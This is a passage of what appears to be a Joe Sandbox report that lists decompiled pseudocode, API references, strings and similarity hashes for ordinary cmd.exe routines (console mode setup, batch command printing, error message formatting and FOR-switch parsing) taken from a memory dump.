				intOrPtr* _t28;
				signed int _t29;
				void* _t30;
				void* _t32;

				_t4 =  *0x1dd0b4; // 0xea614d48
				_t5 = _t4 ^ _t29;
				_v8 = _t5;
				__imp___get_osfhandle( *0x1e3880, __ecx);
				_t6 = SetConsoleMode(_t5, 1);
				__imp___get_osfhandle(0x1e3880);
				_t32 = _t30 + 8;
				_t7 = GetConsoleMode(_t6, 1);
				if(_t7 == 0) {
					L2:
					__imp___get_osfhandle(0x1e3884);
					if(GetConsoleMode(_t7, 0) != 0) {
						_t20 =  *0x1e3884;
						_t8 = _t20 & 0x00000017;
						if(_t8 != 7) {
							_t23 = _t20 & 0xffffffef | 0x00000007;
							 *0x1e3884 = _t23;
							__imp___get_osfhandle(_t23);
							_t8 = SetConsoleMode(_t8, 0);
						}
						_push(_t27);
						_t28 =  *0x1e3888;
						if(_t28 != 0) {
							 *0x1f94b4(L"CMD.EXE");
							_t8 =  *_t28();
						}
						_pop(_t27);
					}
					return E001C6FD0(_t8, _t16, _v8 ^ _t29, _t25, _t26, _t27);
				}
				_t24 =  *0x1dd0e0; // 0x7
				_t25 =  *0x1e3880;
				_t7 = _t24 & _t25;
				if(_t7 != _t24) {
					_t25 = _t25 | _t24;
					 *0x1e3880 = _t25;
					__imp___get_osfhandle(_t25);
					_t32 = _t32 + 4;
					_t7 = SetConsoleMode(_t7, 1);
					if(_t7 != 0) {
						goto L2;
					}
					_t7 =  *0x1dd0e0; // 0x7
					if((_t7 & 0x00000004) != 0) {
						 *0x1dd0e0 = _t7 & 0xfffffffb;
						_t15 =  *0x1e3880 & 0xfffffffb;
						 *0x1e3880 = _t15;
						__imp___get_osfhandle(_t15);
						_t32 = _t32 + 4;
						_t7 = SetConsoleMode(_t15, 1);
					}
				}
				goto L2;
			}

0x001c06c6
0x001c06cb
0x001c06cd
0x001c06d8
0x001c06e2
0x001c06ef
0x001c06f5
0x001c06f9
0x001c0701
0x001c0717
0x001c071e
0x001c0730
0x001c0732
0x001c073a
0x001c073f
0x001c0744
0x001c074a
0x001c0750
0x001c075a
0x001c075a
0x001c0760
0x001c0761
0x001c0769
0x001c0772
0x001c0778
0x001c0778
0x001c077a
0x001c077a
0x001c0788
0x001c0788
0x001c0703
0x001c070b
0x001c0711
0x001c0715
0x001c0789
0x001c078e
0x001c0794
0x001c079a
0x001c079e
0x001c07a6
0x00000000
0x00000000
0x001ccc03
0x001ccc0a
0x001ccc13
0x001ccc1d
0x001ccc23
0x001ccc28
0x001ccc2e
0x001ccc32
0x001ccc32
0x001ccc0a
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 001C06D8
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001D38A5), ref: 001C06E2
_get_osfhandle.MSVCRT ref: 001C06EF
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C06F9
_get_osfhandle.MSVCRT ref: 001C071E
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C0728
_get_osfhandle.MSVCRT ref: 001C0750
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C075A
_get_osfhandle.MSVCRT ref: 001C0794
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C079E
_get_osfhandle.MSVCRT ref: 001CCC28
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001CCC32

Strings

CMD.EXE, xrefs: 001C076B

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID: CMD.EXE
API String ID: 1606018815-3025314500
Opcode ID: cd0d396829e113d6f2e087ca8b5f3e274f73cd03526d3a9671ebdc5d042db93e
Instruction ID: 27e7ef9848dd5040763f5f002aaeb12c6a0844c4651d315c2628d89a6ce81b01
Opcode Fuzzy Hash: cd0d396829e113d6f2e087ca8b5f3e274f73cd03526d3a9671ebdc5d042db93e
Instruction Fuzzy Hash: 7D31A2B1600600ABD718ABB8FC4EF3977A8BB54715B04462CF416C75E0DB75EA80CA45

Uniqueness

Uniqueness Score: -1.00%

Function 001B9835 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E001B9835(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* __ebp;
				intOrPtr _t76;
				intOrPtr _t87;
				intOrPtr _t90;
				signed int _t91;
				signed char _t103;
				signed int _t107;
				intOrPtr _t108;
				signed int _t125;
				signed int _t144;
				intOrPtr* _t179;
				void* _t182;

				_t153 = __edx;
				_t123 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t179 = __ecx;
				_t114 = 0;
				_t182 = __edx;
				_v8 = 0;
				_t76 =  *__ecx;
				if(_t76 > 0x37) {
					__eflags = _t76 - 0x38;
					if(__eflags == 0) {
						E001B9899(0, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						L78:
						_t125 =  *(_t179 + 0x3c);
						L79:
						E001B9835(_t125, _t182, _a4);
						L7:
						return 0;
					}
					if(__eflags <= 0) {
						L54:
						__imp__longjmp(0x1eb8f8, 0xffffffff);
						L55:
						E001B9899(_t114, _a4, "(", _t114);
						_v8 = ")";
						L60:
						E001B9835( *((intOrPtr*)(_t179 + 0x38)), _t182, _a4);
						E001B9899(_t114, _a4, _v8, _t114);
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L7;
						}
						__eflags =  *_t179 - 0x3b;
						if( *_t179 == 0x3b) {
							goto L7;
						}
						goto L78;
					}
					__eflags = _t76 - 0x3a;
					if(_t76 <= 0x3a) {
						_v8 = L"== ";
						__eflags =  *0x1f3cc9;
						if( *0x1f3cc9 != 0) {
							_t87 =  *((intOrPtr*)(__ecx + 0x44));
							__eflags = _t87 - 1;
							if(_t87 != 1) {
								__eflags = _t87 - 2;
								if(_t87 != 2) {
									__eflags = _t87 - 3;
									if(_t87 != 3) {
										__eflags = _t87 - 4;
										if(_t87 != 4) {
											__eflags = _t87 - 5;
											if(_t87 != 5) {
												__eflags = _t87 - 6;
												if(_t87 == 6) {
													_v8 = L"GEQ ";
												}
											} else {
												_v8 = L"GTR ";
											}
										} else {
											_v8 = L"LEQ ";
										}
									} else {
										_v8 = L"LSS ";
									}
								} else {
									_v8 = L"NEQ ";
								}
							} else {
								_v8 = L"EQU ";
							}
						}
						E001B9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)), 1);
						_t114 = 0;
						_push(0);
						_push(_v8);
						L4:
						E001B9899(_t114, _a4);
						if( *(_t179 + 0x3c) != _t114) {
							E001B9899(_t114, _a4,  *(_t179 + 0x3c), _t114);
						}
						E001B9CA6(_t179, _t182, _a4);
						goto L7;
					}
					__eflags = _t76 - 0x3b;
					if(_t76 == 0x3b) {
						L13:
						E001B9CA6(_t123, _t153, _a4);
						_t114 = 1;
						__eflags =  *_t179 - 0x2e;
						if( *_t179 < 0x2e) {
							goto L60;
						}
						__eflags =  *_t179 - 0x2f;
						if( *_t179 <= 0x2f) {
							_v8 = "&";
							goto L60;
						}
						__eflags =  *_t179 - 0x30;
						if( *_t179 == 0x30) {
							_v8 = L"||";
							goto L60;
						}
						__eflags =  *_t179 - 0x31;
						if( *_t179 == 0x31) {
							_v8 = L"&&";
							goto L60;
						}
						__eflags =  *_t179 - 0x32;
						if( *_t179 == 0x32) {
							_v8 = "|";
							goto L60;
						}
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L55;
						} else {
							__eflags =  *_t179 - 0x3b;
							if( *_t179 == 0x3b) {
								E001B9899(1, _a4, "@", 1);
								_v8 = " ";
							}
							goto L60;
						}
					}
					__eflags = _t76 - 0x3c;
					if(_t76 != 0x3c) {
						goto L54;
					}
					_t90 =  *0x1f8510;
					__eflags = _t90 - 0x2396;
					if(_t90 != 0x2396) {
						__eflags = _t90 - 0x2395;
						if(_t90 != 0x2395) {
							__eflags = _t90 - 0x2390;
							if(_t90 != 0x2390) {
								goto L54;
							}
							_t91 = L"REM /?";
							L53:
							E001B9899(_t114, _a4, _t91, 1);
							goto L7;
						}
						_t91 = L"IF /?";
						goto L53;
					}
					_t91 = L"FOR /?";
					goto L53;
				}
				if(_t76 >= 0x34 || _t76 == 0) {
					L3:
					_push(1);
					_push( *((intOrPtr*)(_t179 + 0x38)));
					goto L4;
				} else {
					__eflags = _t76 - 0x2b;
					if(_t76 == 0x2b) {
						E001B9899(1, _a4, L"FOR", 1);
						__eflags =  *0x1f3cc9;
						if( *0x1f3cc9 == 0) {
							L41:
							E001B9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 6, 1);
							E001B9899(1, _a4, "(", 1);
							E001B9899(1, _a4,  *(_t179 + 0x3c), 0);
							E001B9899(1, _a4, ")", 0);
							E001B9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 0x2c, 1);
							_t125 =  *(_t179 + 0x40);
							goto L79;
						}
						_t103 =  *(__ecx + 0x48);
						__eflags = 1 & _t103;
						if((1 & _t103) == 0) {
							__eflags = _t103 & 0x00000002;
							if((_t103 & 0x00000002) == 0) {
								__eflags = _t103 & 0x00000008;
								if((_t103 & 0x00000008) == 0) {
									__eflags = _t103 & 0x00000004;
									if((_t103 & 0x00000004) == 0) {
										goto L41;
									}
									_push(1);
									_push(L"/R");
									L38:
									E001B9899(1, _a4);
									__eflags =  *(_t179 + 0x4c);
									if( *(_t179 + 0x4c) == 0) {
										goto L41;
									}
									_push(1);
									_push( *(_t179 + 0x4c));
									goto L40;
								}
								_push(1);
								_push(L"/F");
								goto L38;
							}
							_push(1);
							_push(L"/D");
							goto L40;
						} else {
							_push(1);
							_push(L"/L");
							L40:
							E001B9899(1, _a4);
							goto L41;
						}
					}
					__eflags = _t76 - 0x2c;
					if(_t76 == 0x2c) {
						E001B9899(1, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						_t107 =  *(__ecx + 0x3c);
						_t144 = 0;
						__eflags =  *_t107 - 0x38;
						if( *_t107 == 0x38) {
							_t108 =  *((intOrPtr*)(_t107 + 0x3c));
							__eflags =  *((intOrPtr*)(_t108 + 0x40)) - 2;
							_t107 =  *(__ecx + 0x3c);
							if( *((intOrPtr*)(_t108 + 0x40)) == 2) {
								_t144 = L"/I";
							}
						} else {
							asm("sbb ecx, ecx");
							_t144 =  !( ~( *((intOrPtr*)(_t107 + 0x40)) - 2)) & L"/I";
						}
						__eflags = _t144;
						if(_t144 != 0) {
							E001B9899(1, _a4, _t144, 1);
							_t107 =  *(_t179 + 0x3c);
						}
						E001B9835(_t107, _t182, _a4);
						E001B9835( *(_t179 + 0x40), _t182, _a4);
						__eflags =  *(_t179 + 0x48);
						if( *(_t179 + 0x48) == 0) {
							goto L7;
						} else {
							E001B9899(1, _a4,  *((intOrPtr*)(_t179 + 0x44)), 1);
							_t125 =  *(_t179 + 0x48);
							goto L79;
						}
					}
					__eflags = _t76 - 0x2d;
					if(__eflags == 0) {
						goto L3;
					}
					if(__eflags <= 0) {
						goto L54;
					}
					__eflags = _t76 - 0x33;
					if(_t76 > 0x33) {
						goto L54;
					}
					goto L13;
				}
			}

0x001b9835
0x001b9835
0x001b983a
0x001b983b
0x001b983f
0x001b9841
0x001b9843
0x001b9845
0x001b9848
0x001b984d
0x001d0ed1
0x001d0ed4
0x001d1036
0x001d103b
0x001d103b
0x001d103e
0x001d1043
0x001b988e
0x001b9896
0x001b9896
0x001d0eda
0x001d0f32
0x001d0f39
0x001d0f3f
0x001d0f4a
0x001d0f4f
0x001d0f7a
0x001d0f82
0x001d0f90
0x001d0f95
0x001d0f98
0x00000000
0x00000000
0x001d0f9e
0x001d0fa1
0x00000000
0x00000000
0x00000000
0x001d0fa7
0x001d0edc
0x001d0edf
0x001d0fae
0x001d0fb6
0x001d0fbd
0x001d0fbf
0x001d0fc2
0x001d0fc4
0x001d0fcf
0x001d0fd2
0x001d0fdd
0x001d0fe0
0x001d0feb
0x001d0fee
0x001d0ff9
0x001d0ffc
0x001d1007
0x001d100a
0x001d100c
0x001d100c
0x001d0ffe
0x001d0ffe
0x001d0ffe
0x001d0ff0
0x001d0ff0
0x001d0ff0
0x001d0fe2
0x001d0fe2
0x001d0fe2
0x001d0fd4
0x001d0fd4
0x001d0fd4
0x001d0fc6
0x001d0fc6
0x001d0fc6
0x001d0fc4
0x001d101c
0x001d1021
0x001d1023
0x001d1024
0x001b9865
0x001b986a
0x001b9872
0x001b987d
0x001b987d
0x001b9889
0x00000000
0x001b9889
0x001d0ee5
0x001d0ee8
0x001d0d18
0x001d0d1b
0x001d0d22
0x001d0d23
0x001d0d26
0x00000000
0x00000000
0x001d0d2c
0x001d0d2f
0x001d0f73
0x00000000
0x001d0f73
0x001d0d35
0x001d0d38
0x001d0f6a
0x00000000
0x001d0f6a
0x001d0d3e
0x001d0d41
0x001d0f61
0x00000000
0x001d0f61
0x001d0d47
0x001d0d4a
0x001d0f58
0x00000000
0x001d0f58
0x001d0d50
0x001d0d53
0x00000000
0x001d0d59
0x001d0d59
0x001d0d5c
0x001d0d6d
0x001d0d72
0x001d0d72
0x00000000
0x001d0d5c
0x001d0d53
0x001d0eee
0x001d0ef1
0x00000000
0x00000000
0x001d0ef3
0x001d0ef8
0x001d0efd
0x001d0f06
0x001d0f0b
0x001d0f14
0x001d0f19
0x00000000
0x00000000
0x001d0f1b
0x001d0f20
0x001d0f28
0x00000000
0x001d0f28
0x001d0f0d
0x00000000
0x001d0f0d
0x001d0eff
0x00000000
0x001d0eff
0x001b9856
0x001b9860
0x001b9860
0x001b9862
0x00000000
0x001d0cf2
0x001d0cf2
0x001d0cf5
0x001d0e18
0x001d0e1d
0x001d0e24
0x001d0e75
0x001d0e82
0x001d0e92
0x001d0ea1
0x001d0eb2
0x001d0ec4
0x001d0ec9
0x00000000
0x001d0ec9
0x001d0e26
0x001d0e29
0x001d0e2b
0x001d0e35
0x001d0e37
0x001d0e41
0x001d0e43
0x001d0e4d
0x001d0e4f
0x00000000
0x00000000
0x001d0e51
0x001d0e52
0x001d0e57
0x001d0e5c
0x001d0e61
0x001d0e65
0x00000000
0x00000000
0x001d0e67
0x001d0e68
0x00000000
0x001d0e68
0x001d0e45
0x001d0e46
0x00000000
0x001d0e46
0x001d0e39
0x001d0e3a
0x00000000
0x001d0e2d
0x001d0e2d
0x001d0e2e
0x001d0e6b
0x001d0e70
0x00000000
0x001d0e70
0x001d0e2b
0x001d0cfb
0x001d0cfe
0x001d0d8a
0x001d0d8f
0x001d0d92
0x001d0d94
0x001d0d97
0x001d0dad
0x001d0db0
0x001d0db4
0x001d0db7
0x001d0db9
0x001d0db9
0x001d0d99
0x001d0da1
0x001d0da5
0x001d0da5
0x001d0dbe
0x001d0dc0
0x001d0dc9
0x001d0dce
0x001d0dce
0x001d0dd8
0x001d0de5
0x001d0dea
0x001d0dee
0x00000000
0x001d0df4
0x001d0dfd
0x001d0e02
0x00000000
0x001d0e02
0x001d0dee
0x001d0d00
0x001d0d03
0x00000000
0x00000000
0x001d0d09
0x00000000
0x00000000
0x001d0d0f
0x001d0d12
0x00000000
0x00000000
0x00000000
0x001d0d12

Strings

REM /?, xrefs: 001D0F1B
EQU , xrefs: 001D0FC6
FOR, xrefs: 001D0E13
FOR /?, xrefs: 001D0EFF
NEQ , xrefs: 001D0FD4
GEQ , xrefs: 001D100C
LSS , xrefs: 001D0FE2
IF /?, xrefs: 001D0F0D, 001D0F27
== , xrefs: 001D0FAE
LEQ , xrefs: 001D0FF0
GTR , xrefs: 001D0FFE

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID:
String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
API String ID: 0-366822981
Opcode ID: 95ed9d35d4d5fba0e9cbb873f16111e6b7f0a99a9d2eb6feea44ac6e4085e271
Instruction ID: b50f424ae4bede9faba57bc2aeacae42278fcff6d9195b97c5c94d4dc47a74e6
Opcode Fuzzy Hash: 95ed9d35d4d5fba0e9cbb873f16111e6b7f0a99a9d2eb6feea44ac6e4085e271
Instruction Fuzzy Hash: 5DA1D170600209FBCF399F55C984AEE7B26EB89390F20851BF5059B351C771AE92D791

Uniqueness

Uniqueness Score: -1.00%

Function 001BC6F4 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 147
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E001BC6F4(long __ecx, intOrPtr _a4, va_list* _a8) {
				signed int _v8;
				char _v40;
				short _v104;
				va_list* _v108;
				long _v112;
				char* _v116;
				char* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				signed int _t26;
				char* _t31;
				void* _t37;
				char* _t45;
				intOrPtr _t48;
				WCHAR* _t55;
				void* _t56;
				signed int _t57;
				signed int _t59;
				long _t60;
				va_list* _t61;
				void* _t62;
				signed int _t63;

				_t22 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t22 ^ _t63;
				_t47 = _a8;
				_t60 = __ecx;
				_v108 = _a8;
				_t62 = 0;
				_v112 = __ecx;
				if(__ecx == 0x13d || FormatMessageW(0x1a00, 0, __ecx, 0, 0x1eb980, 0x2000, 0) == 0) {
					__imp___ultoa(_t60,  &_v40, 0x10);
					_t26 = E001C0638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(_t62,  ~( ~_t26),  &_v40, 0xffffffff,  &_v104, 0x20);
					_v120 =  &_v104;
					_t31 = L"Application";
					if(_t60 < 0x2328) {
						_t31 = L"System";
					}
					_v116 = _t31;
					_t62 = FormatMessageW(0x3000, _t62, 0x13d, _t62, 0x1eb980, 0x2000,  &_v120);
					goto L6;
				} else {
					_t55 = 0x1eb980;
					_t48 = 0x25;
					while(1) {
						_t58 = _t48;
						_t37 = E001BD7D4(_t55, _t48);
						_t56 = _t37;
						if(_t56 == 0) {
							break;
						}
						_t55 = _t56 + 2;
						_t59 =  *_t55 & 0x0000ffff;
						if(_t59 - 0x31 > 8) {
							if(_t59 == _t48) {
								_t55 =  &(_t55[1]);
							}
						} else {
							_t62 = _t62 + 1;
						}
					}
					_t47 = _v108;
					if(_t62 > _a4) {
						_t47 = HeapAlloc(GetProcessHeap(), 0, _t62 << 2);
						if(_t47 == 0) {
							L8:
							return E001C6FD0(_t34, _t47, _v8 ^ _t63, _t58, _t60, _t62);
						}
						_t57 = 0;
						if(_t62 == 0) {
							L21:
							_t62 = FormatMessageW(0x3800, 0, _t60, 0, 0x1eb980, 0x2000, _t47);
							RtlFreeHeap(GetProcessHeap(), 0, _t47);
							L7:
							_t34 = _t62;
							goto L8;
						}
						_t61 = _v108;
						_t58 = _a4;
						do {
							if(_t57 >= _t58) {
								_t45 = " ";
							} else {
								 *_t61 =  &(( *_t61)[4]);
								_t45 =  *( *_t61 - 4);
							}
							_t47[_t57] = _t45;
							_t57 = _t57 + 1;
						} while (_t57 < _t62);
						_t60 = _v112;
						goto L21;
					}
					_t62 = FormatMessageW(0x1800, _t37, _t60, _t37, 0x1eb980, 0x2000, _t47);
					L6:
					goto L7;
				}
			}

0x001bc6fc
0x001bc703
0x001bc707
0x001bc70c
0x001bc70e
0x001bc711
0x001bc713
0x001bc71c
0x001caf0e
0x001caf1f
0x001caf2e
0x001caf38
0x001caf41
0x001caf44
0x001caf4f
0x001caf51
0x001caf51
0x001caf56
0x001bc77d
0x00000000
0x001bc743
0x001bc745
0x001bc74a
0x001bc74b
0x001bc74b
0x001bc74d
0x001bc752
0x001bc756
0x00000000
0x00000000
0x001bc794
0x001bc797
0x001bc7a1
0x001cae7e
0x001cae84
0x001cae84
0x001bc7a7
0x001bc7a7
0x001bc7a7
0x001bc7a1
0x001bc758
0x001bc75e
0x001caea1
0x001caea5
0x001bc781
0x001bc791
0x001bc791
0x001caeab
0x001caeaf
0x001caed5
0x001caef3
0x001caefc
0x001bc77f
0x001bc77f
0x00000000
0x001bc77f
0x001caeb1
0x001caeb4
0x001caeb7
0x001caeb9
0x001caec5
0x001caebb
0x001caebb
0x001caec0
0x001caec0
0x001caeca
0x001caecd
0x001caece
0x001caed2
0x00000000
0x001caed2
0x001bc77d
0x001bc777
0x00000000
0x001bc77d

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,?,00000000,001EB980,00002000,00000000,00000000,?,00000000), ref: 001BC735

Part of subcall function 001BD7D4: wcschr.MSVCRT ref: 001BD7DA

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,?,00000000,001EB980,00002000,?), ref: 001BC777
_ultoa.MSVCRT ref: 001CAF0E
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 001CAF17
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,000000FF,?,00000020), ref: 001CAF38

Strings

Application, xrefs: 001CAF44
System, xrefs: 001CAF51

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
String ID: Application$System
API String ID: 3538039442-3455788185
Opcode ID: 145c9f5ff6a56a4a951941e3be3032ac4a73bd4278b5f8c0790d432ee8b0b0e5
Instruction ID: fa09f48597b0dc4e649f47e7081dccc69ef9f337e333f7a1ed045bcce556bb64
Opcode Fuzzy Hash: 145c9f5ff6a56a4a951941e3be3032ac4a73bd4278b5f8c0790d432ee8b0b0e5
Instruction Fuzzy Hash: 9F41F5B2604319ABDB159B64CC89FFFBB68EB55714F200129F606EB280DB709D40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001C04A0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E001C04A0(signed int __eax, void* __ebx, void* __edx, void* __edi) {
				signed int _v4;
				WCHAR* _v8;
				long* _v12;
				long _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v544;
				WCHAR* _v548;
				WCHAR* _v552;
				WCHAR* __esi;
				signed int _t106;
				short _t107;
				void* _t112;
				signed int _t115;
				void* _t117;
				WCHAR** _t119;
				short _t120;
				signed int _t124;
				signed short* _t125;
				WCHAR* _t129;

				_t117 = __ebx;
				_t106 = __eax;
				if( *0x1efa90 != 0x4000) {
					_t107 =  *0x1efaa0;
					__eflags = _t107 - 0x28;
					if(_t107 != 0x28) {
						__eflags = _t107 - 0x40;
						if(_t107 == 0x40) {
							goto L140;
						} else {
							goto L150;
						}
					} else {
						L140:
						_t119 = 0x50;
						_t129 = E001C00B0(0x50);
						__eflags = _t129;
						if(_t129 == 0) {
							E001D9287(0x50);
							__imp__longjmp(0x1eb8b8, 1);
							asm("int3");
							_t106 =  *0x50 & 0x0000ffff;
							_t124 = _t106;
							__eflags = _t106;
							if(_t106 != 0) {
								_t106 = 0;
								__eflags = 0;
								do {
									_t125 = _t119;
									_t119 = _t119 + _t129;
									__eflags =  *_t119;
								} while ( *_t119 != 0);
								_t124 =  *_t125 & 0x0000ffff;
							}
							__eflags = _t124 - 0x3a;
							if(_t124 != 0x3a) {
								 *0x1dd55c = 3;
							}
							return _t106;
						} else {
							__eflags =  *0x1efaa0 - 0x28;
							if( *0x1efaa0 != 0x28) {
								 *_t129 = 0x3b;
								_t120 = 0;
							} else {
								 *_t129 = 0x33;
								do {
									_t115 = E001BF030(0x10);
									__eflags =  *0x1efaa0 - 0xa;
								} while ( *0x1efaa0 == 0xa);
								__eflags = 0;
								E001BF300(_t115, 0, 0, 0);
								_t120 = 0x33;
							}
							_t129[0x1c] = E001BDC74(_t117, _t120);
							__eflags =  *_t129 - 0x3b;
							if( *_t129 == 0x3b) {
								L147:
								return _t129;
							} else {
								_t112 = E001BF030(0x10);
								__eflags = _t112 - 0x29;
								if(_t112 != 0x29) {
									L150:
									E001D82EB(0x10);
									__eflags = 0;
									return 0;
								} else {
									goto L147;
								}
							}
						}
					}
				} else {
					__imp___wcsicmp(L"FOR", 0x1efaa0);
					__esp = __esp + 8;
					__eflags = __eax;
					if(__eax == 0) {
						L152:
						_pop(__esi);
						__edi = 0;
						__imp___wcsicmp(L"FOR/?", __edi, __esi);
						_pop(__ecx);
						__ecx = 0x1efaa0;
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = 0;
							__edi = 0;
							 *0x1efaa6 = __ax;
							__edi = 1;
						}
						__ecx = 0x2b;
						 *0x1efa8c = 0x1e;
						__esi = E001BE9A0(__ecx, __eflags);
						__eax = 0x2f;
						__eflags = __edi;
						if(__edi != 0) {
							 *0x1efaa0 = __ax;
							__eax = 0x3f;
							 *0x1efaa2 = __ax;
							__eax = 0;
							 *0x1efaa4 = __ax;
						} else {
							__ecx = 0;
							__eflags = 0;
							__eax = E001BF030(0);
						}
						__edx = 0x2b;
						__eax = E001BDCE1(__ebx, __edx, __edi);
						__eflags = __al;
						if(__al != 0) {
							__esi[0x1c] = __esi[0x1c] & 0x00000000;
							 *__esi = 0x3c;
						} else {
							__esi[0x24] = __esi[0x24] & 0x00000000;
							__eflags =  *0x1f3cc9;
							__eax = 0x25;
							if( *0x1f3cc9 != 0) {
								__edi = 0;
								__edi = 1;
								__eflags = 1;
								while(1) {
									__imp___wcsicmp(L"/L");
									_pop(__ecx);
									__ecx = 0x1efaa0;
									__eflags = __eax;
									if(__eax == 0) {
										goto L32;
									}
									L9:
									__imp___wcsicmp(L"/D");
									_pop(__ecx);
									__ecx = 0x1efaa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000002;
										L27:
										__ecx = 0;
										__eax = E001BF030(0);
										while(1) {
											__imp___wcsicmp(L"/L");
											_pop(__ecx);
											__ecx = 0x1efaa0;
											__eflags = __eax;
											if(__eax == 0) {
												goto L32;
											}
											goto L9;
										}
										goto L32;
									}
									__imp___wcsicmp(L"/F");
									_pop(__ecx);
									__ecx = 0x1efaa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000008;
										__ecx = 0;
										__eax = E001BF030(0);
										__ax =  *0x1efaa0;
										__ecx = 0x25;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											continue;
										} else {
											__ecx = 0x2f;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__eflags = __esi[0x26];
												if(__esi[0x26] != 0) {
													__eax = E001D82EB(__ecx);
												}
												__eax =  *0x1efa8c;
												__ecx = 6 +  *0x1efa8c * 2;
												__eax = E001C00B0(__ecx);
												__eflags = __eax;
												if(__eax == 0) {
													goto L212;
												} else {
													__edx =  *0x1efa8c;
													__edx =  &(( *0x1efa8c)[1]);
													goto L26;
												}
											}
										}
										goto L218;
									} else {
										__imp___wcsicmp(L"/R");
										_pop(__ecx);
										__ecx = 0x1efaa0;
										__ecx = __esi[0x24];
										__eflags = __eax;
										if(__eax == 0) {
											__esi[0x24] = __ecx;
											__ecx = 0;
											__eax = E001BF030(0);
											__eflags = __esi[0x26];
											if(__esi[0x26] != 0) {
												__eax = E001D82EB(__ecx);
											}
											__ax =  *0x1efaa0;
											__ecx = 0x25;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__ecx = 0x2f;
												__eflags = __ax - __cx;
												if(__ax == __cx) {
													continue;
												} else {
													__eax =  *0x1efa8c;
													__ecx = 2 +  *0x1efa8c * 2;
													__eax = E001C00B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														L212:
														__eax = E001D9287(__ecx);
														__imp__longjmp(0x1eb8b8, __edi);
														goto L213;
													} else {
														__edx =  *0x1efa8c;
														__edx =  &(( *0x1efa8c)[0]);
														L26:
														__ecx = __eax;
														__esi[0x26] = __eax;
														__eax = E001C1040(__eax, __edx, 0x1efaa0);
														goto L27;
													}
												}
											}
											goto L218;
										} else {
											__eflags = __ecx;
											if(__ecx != 0) {
												__eflags = __ecx - 8;
												if(__ecx != 8) {
													__eflags = __ecx - 2;
													if(__ecx != 2) {
														__eflags = __ecx - __edi;
														if(__ecx != __edi) {
															L213:
															__eflags = __ecx - 6;
															if(__ecx != 6) {
																__eflags = __ecx - 4;
																if(__ecx != 4) {
																	__eax = E001D82EB(__ecx);
																}
															}
														}
													}
												}
											}
										}
									}
									__eax = 0x25;
									goto L15;
									L32:
									__esi[0x24] = __esi[0x24] | __edi;
									goto L27;
								}
							}
							L15:
							__eflags =  *0x1efaa0 - __ax;
							if( *0x1efaa0 != __ax) {
								L216:
								__eax = E001D82EB(__ecx);
							} else {
